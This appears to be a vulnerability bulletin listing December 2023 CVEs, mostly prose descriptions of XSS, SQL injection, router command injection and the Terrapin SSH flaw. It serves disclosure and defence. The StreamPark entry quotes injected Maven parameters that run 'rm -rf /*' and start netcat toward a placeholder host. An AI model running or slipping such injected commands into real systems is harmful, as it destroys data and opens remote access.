code-projects — faculty_management_system A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. 2023-12-22 2.4 CVE-2023-7056
cna@vuldb.com
code-projects — point_of_sales_and_inventory_management_system A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. 2023-12-22 3.5 CVE-2023-7075
cna@vuldb.com
enterprise_server — enterprise_server A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 3.9 CVE-2023-6690
product-cna@github.com
enterprise_server — enterprise_server An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 2.7 CVE-2023-51380
product-cna@github.com
gallagher — controller_6000 Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller’s default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier. 2023-12-18 2.4 CVE-2023-41967
disclosures@gallagher.com
gallagher — multiple_products Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. 2023-12-18 3.1 CVE-2023-22439
disclosures@gallagher.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of. 2023-12-15 3.5 CVE-2023-3511
cve@gitlab.com
keycloak — keycloak Keycloak’s device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client. 2023-12-21 3.5 CVE-2023-2585
secalert@redhat.com
libssh — libssh A flaw was found in libssh’s abstract layer for message digest (MD) operations, which are implemented by the different supported crypto backends. The return values from these were not properly checked, which could cause failures in low-memory situations, NULL dereferences, crashes, or use of uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection. 2023-12-19 3.7 CVE-2023-6918
secalert@redhat.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 2023-12-22 3.5 CVE-2023-51649
security-advisories@github.com
nextcloud — security-advisories Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 2023-12-22 3.5 CVE-2023-48308
security-advisories@github.com
phpgurukul — online_notes_sharing_system A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability. 2023-12-21 3.5 CVE-2023-7050
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. 2023-12-22 3.1 CVE-2023-7053
cna@vuldb.com
slawkens — myaac A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. 2023-12-22 3.5 CVE-2023-7076
cna@vuldb.com
sourcecodester — online_student_management_system A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability. 2023-12-19 2.4 CVE-2023-6945
cna@vuldb.com
sourcecodester — school_visitor_log_e-book A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. 2023-12-22 3.5 CVE-2023-7059
cna@vuldb.com
w3c — online-spellchecker-py A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. 2023-12-23 3.1 CVE-2014-125108
cna@vuldb.com
wordpress — wordpress Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0. 2023-12-19 3.7 CVE-2022-45809
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz. This issue affects Comments – wpDiscuz: from n/a through 7.6.3. 2023-12-20 2.7 CVE-2023-46311
audit@patchstack.com


Severity Not Yet Assigned

Primary Vendor — Product Description Published CVSS Score Source & Patch Info
apache — airflow Apache Airflow, versions 2.6.0 through 2.7.3, has a stored XSS vulnerability that allows a DAG author to add unbounded and unsanitized JavaScript in the parameter description field of the DAG. This JavaScript can be executed in the browser sandbox of any user who looks at the tasks. While this issue does not allow escaping the browser sandbox or manipulating server-side data beyond what the DAG author already can, it allows modifying what the user looking at the DAG details sees in the browser, which opens up all kinds of possibilities for misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability. 2023-12-21 not yet calculated CVE-2023-47265
security@apache.org
apache — airflow Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus enabling the user to clear DAGs they shouldn’t. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2. Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability. 2023-12-21 not yet calculated CVE-2023-48291
security@apache.org
apache — airflow Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser – by the user who also had Airflow UI opened – to trigger the execution of DAGs without the user’s consent. Users are advised to upgrade to version 2.8.0 or later which is not affected 2023-12-21 not yet calculated CVE-2023-49920
security@apache.org
apache — iotdb Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue. 2023-12-21 not yet calculated CVE-2023-51656
security@apache.org
apache — airflow Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue 2023-12-21 not yet calculated CVE-2023-50783
security@apache.org
apple — macos A session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content. 2023-12-19 not yet calculated CVE-2023-42940
product-security@apple.com
array — arrayos_ag MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. 2023-12-22 not yet calculated CVE-2023-51707
cve@mitre.org
assetwise_integrity_information_server — assetwise_integrity_information_server Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. 2023-12-22 not yet calculated CVE-2023-51708
cve@mitre.org
bcoin-org — bcoin An issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component vendorfaye-websocket.js. 2023-12-21 not yet calculated CVE-2023-50475
cve@mitre.org
blinksocks — blinksocks An issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js. 2023-12-21 not yet calculated CVE-2023-50481
cve@mitre.org
buildkite — elastic_ci_for_aws A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43116
cve@mitre.org
buildkite — elastic_ci_for_aws A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43741
cve@mitre.org
cacti — cacti Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. 2023-12-22 not yet calculated CVE-2023-50569
cve@mitre.org
cams_biometrics — multiple_products SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. 2023-12-15 not yet calculated CVE-2023-48050
cve@mitre.org
cesanta — mjs Buffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via a segmentation fault that can occur in getprop_builtin_foreign when the input string includes the name of a built-in API. 2023-12-20 not yet calculated CVE-2023-50044
cve@mitre.org
cryptopp —  cryptopp Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding. 2023-12-18 not yet calculated CVE-2023-50979
cve@mitre.org
cryptopp —  cryptopp gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing. 2023-12-18 not yet calculated CVE-2023-50980
cve@mitre.org
cryptopp —  cryptopp ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853. 2023-12-18 not yet calculated CVE-2023-50981
cve@mitre.org
cuppacms — cuppacms SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter. 2023-12-20 not yet calculated CVE-2023-47990
cve@mitre.org
devolutions — remote_desktop_manager Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources. 2023-12-21 not yet calculated CVE-2023-7047
security@devolutions.net
filerun — filerun FileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request. 2023-12-22 not yet calculated CVE-2022-47532
cve@mitre.org
free5gc — free5gc An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message. 2023-12-22 not yet calculated CVE-2023-49391
cve@mitre.org
google — chrome Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High) 2023-12-20 not yet calculated CVE-2023-3742
chrome-cve-admin@google.com
google — chrome Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-21 not yet calculated CVE-2023-7024
chrome-cve-admin@google.com
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module. 2023-12-21 not yet calculated CVE-2023-29485
cve@mitre.org
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component. 2023-12-21 not yet calculated CVE-2023-29486
cve@mitre.org
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module. 2023-12-21 not yet calculated CVE-2023-29487
cve@mitre.org
huggingface — transformers Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. 2023-12-19 not yet calculated CVE-2023-6730
security@huntr.dev
huggingface — transformers Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. 2023-12-20 not yet calculated CVE-2023-7018
security@huntr.dev
ivanti — avalanche An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. 2023-12-19 not yet calculated CVE-2021-22962
support@hackerone.com
ivanti — avalanche An unauthenticated attacker could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server. 2023-12-19 not yet calculated CVE-2023-46262
support@hackerone.com
ivanti — avalanche An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. 2023-12-19 not yet calculated CVE-2023-46266
support@hackerone.com
libming — libming Buffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component. 2023-12-20 not yet calculated CVE-2023-50628
cve@mitre.org
linotp — linotp Defective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal. 2023-12-19 not yet calculated CVE-2023-49706
cve@mitre.org
lockss-daemon — lockss-daemon lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. 2023-12-15 not yet calculated CVE-2023-42183
cve@mitre.org
ltb_self_service_password — ltb_self_service_password An issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone. 2023-12-21 not yet calculated CVE-2023-49032
cve@mitre.org
mediawiki — mediawiki An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. 2023-12-22 not yet calculated CVE-2023-51704
cve@mitre.org
mlflow — mlflow With only one user interaction (download a malicious config), attackers can gain full command execution on the victim system. 2023-12-19 not yet calculated CVE-2023-6940
security@huntr.dev
mlflow — mlflow A malicious user could use this issue to access internal HTTP(s) servers and, in the worst case (i.e., an AWS instance), it could be abused to get remote code execution on the victim machine. 2023-12-20 not yet calculated CVE-2023-6974
security@huntr.dev
mlflow — mlflow A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information. 2023-12-20 not yet calculated CVE-2023-6975
security@huntr.dev
mlflow — mlflow This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process. 2023-12-20 not yet calculated CVE-2023-6976
security@huntr.dev
mlflow — mlflow This vulnerability enables malicious users to read sensitive files on the server. 2023-12-20 not yet calculated CVE-2023-6977
security@huntr.dev
mp3gain — mp3gain A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. 2023-12-22 not yet calculated CVE-2023-49356
cve@mitre.org
multiple_vendors — multiple_products Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. 2023-12-22 not yet calculated CVE-2023-24609
cve@mitre.org
nintendo — ds DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client’s machine via a modified GPCM message. 2023-12-20 not yet calculated CVE-2023-45887
cve@mitre.org
nos_client — nos_client An issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js. 2023-12-21 not yet calculated CVE-2023-50477
cve@mitre.org
openssh — openssh The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH’s use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust. 2023-12-18 not yet calculated CVE-2023-48795
cve@mitre.org
pdf24_creator — pdf24_creator An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe. 2023-12-19 not yet calculated CVE-2023-49147
cve@mitre.org
phpsysinfo — phpsysinfo Cross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file. 2023-12-19 not yet calculated CVE-2023-49006
cve@mitre.org
proftpd — proftpd make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. 2023-12-22 not yet calculated CVE-2023-51713
cve@mitre.org
qbit-matui — qbit-matui Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file. 2023-12-21 not yet calculated CVE-2023-50473
cve@mitre.org
ruijie — ws6008 Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles. 2023-12-20 not yet calculated CVE-2023-50993
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51048
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51049
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51050
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51051
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51052
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name. 2023-12-21 not yet calculated CVE-2023-48114
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request. 2023-12-21 not yet calculated CVE-2023-48115
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment. 2023-12-21 not yet calculated CVE-2023-48116
cve@mitre.org
softing — edgeaggregator Softing edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543. 2023-12-19 not yet calculated CVE-2023-38126
zdi-disclosures@trendmicro.com
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It’s possible to know if a specific user account exists on the SNS firewall by using remote access commands. 2023-12-21 not yet calculated CVE-2023-41166
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine. 2023-12-21 not yet calculated CVE-2023-47093
cve@mitre.org
streampark — streampark In streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & 2023-12-15 not yet calculated CVE-2023-49898
security@apache.org
sudo — sudo Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. 2023-12-22 not yet calculated CVE-2023-42465
cve@mitre.org
thirty_bees — thirty_bees A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. 2023-12-22 not yet calculated CVE-2023-45957
cve@mitre.org
totolink — a3700r There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi.cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513. 2023-12-22 not yet calculated CVE-2023-50147
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. 2023-12-22 not yet calculated CVE-2023-51033
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. 2023-12-22 not yet calculated CVE-2023-51034
cve@mitre.org
totolink — ex1200l TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. 2023-12-22 not yet calculated CVE-2023-51035
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanPriDns’ parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51011
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanGateway’ parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51012
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanNetmask’ parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51013
cve@mitre.org
totolink — ex1800t TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanSecDns’ parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51014
cve@mitre.org
totolink — ex1800t TOTOLINK EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable’ parameter of the setDmzCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51015
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51016
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘lanIp’ parameter of the setLanConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51017
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51018
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51019
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51020
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51021
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51022
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51023
cve@mitre.org
